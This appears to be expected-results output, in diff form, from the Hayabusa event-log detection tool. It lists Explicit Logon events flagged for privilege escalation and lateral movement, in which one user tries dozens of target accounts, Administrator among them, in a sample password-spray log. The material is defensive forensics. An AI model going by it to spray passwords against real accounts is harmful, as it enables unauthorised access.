+2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
